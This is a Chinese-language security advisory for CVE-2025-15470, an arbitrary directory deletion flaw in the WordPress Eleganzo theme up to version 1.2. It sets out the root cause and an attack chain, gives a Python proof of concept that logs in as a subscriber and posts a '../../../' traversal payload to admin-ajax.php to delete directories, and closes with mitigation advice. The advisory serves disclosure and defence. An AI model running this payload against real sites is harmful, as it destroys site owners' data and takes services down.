CVE-2025-15470 CVSS 6.5 中危

CVE-2025-15470 WordPress Eleganzo主题任意目录删除漏洞

披露日期: 2026-04-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15470

漏洞类型

任意目录删除

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Eleganzo 主题

漏洞概述

WordPress Eleganzo主题在1.2及以下版本中存在安全漏洞。由于akd_required_plugin_callback函数缺乏足够的路径验证，导致经过身份验证的攻击者（仅需订阅者权限）即可利用此漏洞删除服务器上的任意目录，包括WordPress根目录，从而造成严重的数据丢失或服务拒绝。

技术细节

该漏洞的根本原因是Eleganzo主题中的`akd_required_plugin_callback`函数未对用户传入的路径参数进行严格的校验和过滤。在WordPress架构中，该函数通常挂载在AJAX处理钩子上，允许前端通过HTTP请求调用。攻击者构造包含目录遍历字符（如`../`）的恶意Payload发送给服务器，由于缺乏`realpath`或类似的安全检查，后端直接将攻击者控制的路径传递给文件系统操作函数（如PHP的`rmdir`）。结合CVSS向量分析，攻击者仅需低权限账户且无需用户交互即可通过网络发起攻击，成功利用可导致服务器关键文件被删除，网站完整性遭到破坏。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者在目标WordPress站点注册一个账户，或利用已有的订阅者级别权限账户。

STEP 2

步骤2：分析 vulnerable 函数

识别出Eleganzo主题中存在的akd_required_plugin_callback函数，并确定其未对路径参数进行过滤。

STEP 3

步骤3：构造恶意请求

构造包含目录遍历序列（如../../）的POST请求发送到wp-admin/admin-ajax.php，指定action为akd_required_plugin_callback。

STEP 4

步骤4：执行目录删除

服务器端处理请求，调用文件系统删除函数，删除攻击者指定的目录（如WordPress根目录）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: WordPress Eleganzo Theme <= 1.2 - Arbitrary Directory Deletion
# CVE: CVE-2025-15470

target_url = "http://example.com/wp-admin/admin-ajax.php"

# Attacker credentials (Subscriber level is sufficient)
username = "attacker"
password = "password"

# 1. Authenticate and get session cookie
session = requests.Session()
login_payload = {
    'log': username,
    'pwd': password,
    'redirect_to': 'http://example.com/wp-admin/',
    'wp-submit': 'Log In'
}
session.post("http://example.com/wp-login.php", data=login_payload)

# 2. Prepare payload to delete arbitrary directory
# The function 'akd_required_plugin_callback' expects a path parameter
# Using '../' to traverse out of the WordPress directory
exploit_data = {
    'action': 'akd_required_plugin_callback',
    'path': '../../../' # Attempting to delete parent directories
}

# 3. Send exploit request
response = session.post(target_url, data=exploit_data)

if response.status_code == 200:
    print("[+] Exploit request sent successfully.")
    print("[+] Check if the target directory has been deleted.")
else:
    print("[-] Exploit failed.")

影响范围

Eleganzo <= 1.2

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用Eleganzo主题并切换至其他受信任的主题。同时，检查服务器文件系统是否有异常的目录删除情况，并从备份中恢复丢失的数据。对于代码层面的临时修复，可以在主题的functions.php文件中对该函数添加路径合法性校验。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表